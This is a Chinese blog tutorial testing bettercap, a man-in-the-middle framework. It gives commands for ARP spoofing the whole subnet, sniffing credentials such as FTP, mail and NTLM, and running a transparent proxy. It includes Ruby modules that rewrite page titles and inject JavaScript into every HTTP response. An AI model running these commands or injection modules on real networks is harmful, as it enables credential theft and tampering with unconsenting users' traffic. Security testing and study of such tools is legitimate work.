0x00前言

上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap

0x01简介

bettercap可用来实现各种中间人攻击,模块化,便携、易扩展

0x02特点

提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 原因如下:

1、ettercap很成功,但在新时代下它已经老了 2、ettercap的过滤器复杂,使用门槛高 3、在大型网络下,主机发现功能效果很差 4、优化不够,对研究人员来说,无用的功能太多 5、扩展性不够,开发需要掌握C/C++语言

0x03测试环境搭建

kali linux:

git clone https://github.com/evilsocket/bettercap

cd bettercap

gem build bettercap.gemspec

sudo gem install bettercap*.gem

如果报错,如图:

执行如下命令:

sudo apt-get install ruby-dev libpcap-dev

sudo gem install bettercap*.gem

最后成功,如图:

0x04参数说明

已做翻译并加入个人理解

用法:

-I, --interface IFACE 指定Network interface name,默认eth0

-S, --spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项

-T, --target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐
-O, --log LOG_FILE 日志功能

-D, --debug 调试功能,会将每一步操作详细记录,便于调试

-L, --local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭

-X, --sniffer 开启嗅探器. --sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) --sniffer-filter EXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器)

-P, --parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 --no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 --no-spoofing 关闭欺骗模块,也可以使用参数--spoofer NONE代替 --proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 --proxy-port PORT 设置HTTP代理端口,此参数默认为8080 --proxy-module MODULE 指定加载的Ruby模块 --httpd 开启HTTP服务器,此参数默认为关闭 --httpd-port PORT 指定HTTP server port, 此参数默认为8081. --httpd-path PATH 指定HTTP server path,此参数默认为 ./.

-h, --help 英文帮助

0x05功能测试

1、HOST DISCOVERY + ARP MAN IN THE MIDDLE

sudo bettercap -X

扫描全部内网主机,傻瓜式操作,自动扫描并进行arp欺骗,使所有流量经过本机,如图

2、CREDENTIALS SNIFFER

抓取流量中有价值的信息,包括:

URLs being visited.

HTTPS host being visited.

HTTP POSTed data.

HTTP Basic and Digest authentications.

FTP credentials.

IRC credentials.

POP, IMAP and SMTP credentials.

NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

用法举例:

默认傻瓜模式,开启所有功能:

sudo bettercap -X

如图为抓到的163邮箱登陆数据

指定抓取的数据包:

sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"

如图为抓到192.168.40.146的FTP

3、MODULAR TRANSPARENT PROXY

代理功能,可以拦截篡改HTTP流量

用法举例:

开启代理功能:

sudo bettercap --proxy

开启代理功能并指定端口:

sudo bettercap --proxy --proxy-port=8081

关闭arp欺骗,只开启代理

sudo bettercap -S NONE --proxy

开启代理功能并加载指定的Ruby模块

sudo bettercap --proxy --proxy-module=hack_title.rb

Ruby参考示例:

class HackTitle < Proxy::Module

def on_request( request, response )

# is it a html page?

if response.content_type == 'text/html'

Logger.info "Hacking http://#{request.host}#{request.url} title tag"

# make sure to use sub! or gsub! to update the instance

response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )

end

end

end

功能为替换所有html的标题选项

4、BUILTIN HTTP SERVER

内置HTTP SERVER功能,可篡改HTTP响应包内容

用法举例:

在网络的每一个HTTP响应中注入JS文件

sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb

Ruby参考示例:

class InjectJS < Proxy::Module

def on_request( request, response )

# is it a html page?

if response.content_type == 'text/html'

Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"

# get the local interface address and HTTPD port

localaddr = Context.get.iface[:ip_saddr]

localport = Context.get.options[:httpd_port]

# inject the js

response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js'

type='text/javascript'></script>" )

end

end

end

0x06测试心得

亮点:

中间人攻击利用框架的开发,便携,安装简单 整合了各种常用功能,功能模块化,自动欺骗攻击,提高效率 极大降低了工具的使用和开发门槛

不足:

目前只支持arp欺骗,功能仍需完善。

暂不支持windows

0x07总结

之前我用过c++开发arp欺骗&中间人攻击的程序,个人认为arp欺骗的成功与否关键在于ARP缓存表的修改,锁定ARP缓存表目前就能防御bettercap基于arp的中间人攻击 但我相信,bettercap的前景十分广阔。

0x08补充

bettercap下载地址:

http://www.bettercap.org/

水平有限,欢迎补充。

转载于:https://www.cnblogs.com/h4ck0ne/p/5154582.html

中间人攻击利用框架bettercap测试相关推荐

  1. 强大的中间人攻击工具(Bettercap)

    目录 前言 安装 常用功能及模块介绍 实战应用 ARP欺骗 DNS欺骗 注入脚本 替换下载文件 ~~~~~~~~         因为想要面对一个新的开始,一个人必须有梦想.有希望.有对未来的憧憬.如 ...

  2. 浏览器利用框架BeEF测试-成功截取微博账号

    0x00 前言 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具. 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认 ...

  3. 中间人攻击框架以及工具,中国寒龙出品欢迎下载!~

    MITMf:中间人攻击框架 MITMF是一个可用于中间人攻击的框架.这个框架是基于Python的,它拥有数个插件,增加了更多的渗透测试方面的功能.一些实用的插件: jskeylogger – 这个插件 ...

  4. SSL\TLS中间人攻击

    攻击者位于客户端和服务器通信链路中 ARP DHCP 修改网关 修改DNS 修改HOSTS ICMP\STP\OSPF 加密流量 攻击的前提 客户端已经信任伪造证书颁发机构 攻击者控制了核心证书颁发机 ...

  5. 更便捷的中间人攻击框架Xerosploit

    文章首发于FreeBuf 0×00 前言 偶然间,在国外网站的一篇文章中发现有提到这款中间人框架,顺藤摸瓜拿来实践一番,发现确实很可以,确实很方便,不敢独享,特来抛砖引玉,不足之处还望斧正~ 0×01 ...

  6. Kali Linux Web 渗透测试秘籍 第八章 中间人攻击

    第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之 ...

  7. 利用域名(host碰撞)碰撞实现从任何地方发起中间人攻击(理论篇)

    简述 相比大家对中间人劫持的攻击相当了解,尤其是局域网中的中间人攻击.有很多的利用手段比如ARP投毒.DNS投毒.ICMP重定向等等,这类的文章在网上非常的多.但是今天要讨论的是一个全新的中间人攻击方 ...

  8. SSH协议弱加密算法漏洞的利用及复现(中间人攻击)

    SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...

  9. 如何利用 LTE/4G 伪基站+GSM 中间人攻击攻破所有短信验证

    这次公开课请来的嘉宾对自己的简介是: 连续创业失败的创业导师: 伪天使投资人: 某非知名私立大学创办人兼校长: 业余时间在本校通信安全实验室打杂. 自从他在黑客大会上演讲<伪基站高级利用技术-- ...

  10. 【Linux云计算架构:第三阶段-Linux高级运维架构】第19章——安装Kali黑客操作系统-利用ettercap实施中间人攻击

    内容: 19.1 安装Kali黑客操作系统及相关实战 19.2 实战:linux之kali系统ssh服务开启 19.3 实战: kali下的nmap扫描工具 19.4 MITM中间人攻击理论 19.5 ...

最新文章

  1. Centos7 nginx 虚拟主机、反向代理服务器及负载均衡,多台主机分离php-fpm实验
  2. 2018-06-13(日常运维三)
  3. 进行有效编辑的七种习惯
  4. linux 安装RedisLive
  5. Ken Block 漂移大叔,程序实现精准漂移算法。
  6. vs下qt的信号与槽实现
  7. vmware esxi 4.0 上安装postfix,mailx发送邮件
  8. WinSock学习笔记(二)
  9. 三、python环境的搭建之建建建
  10. 汽车租赁管理系统(管理车辆基本信息、租车/还车、统计租金)
  11. CAD/CASS断面插件合集断面工具箱批量提取断面数据绘制断面图(断面必备)
  12. stata 求输出相关系数矩阵命令_一文读懂结果输出命令大全(上)
  13. excel表格末尾添加一行_Excel这些办公必备小技巧,Excel表格轻松搞定
  14. 非线性控制1.2——LaSalle不变集原理
  15. UJN_c++_Contest4735
  16. Java实验06-GUI文件加解密软件,ScrollPanel嵌套Boxlayout,DES分组加密算法,进度条控制
  17. 环保设备公司网络推广的方法
  18. MySQL官方示例数据库的使用
  19. 2007女足世界杯 巴西 vs 美国 之后
  20. 66页3万字医疗行业大数据治理解决方案

热门文章

  1. Redis 6.0 源码阅读笔记(4) -- String 数据类型源码分析
  2. linux创建n个进程的方法 --- fork
  3. c/c++常见关键字
  4. jquery 设置背景
  5. 面试题--------9、mysql的drop delete truncate 分别在什么场景下使用
  6. 开启MyBatis(三)工作原理
  7. SpringMVC创建用户信息(一)
  8. 【渝粤教育】国家开放大学2018年秋季 0242-21T机械制图 参考试题
  9. oledb操作Excel
  10. C++ 需要返回值的函数却没有返回值的情况 单例模式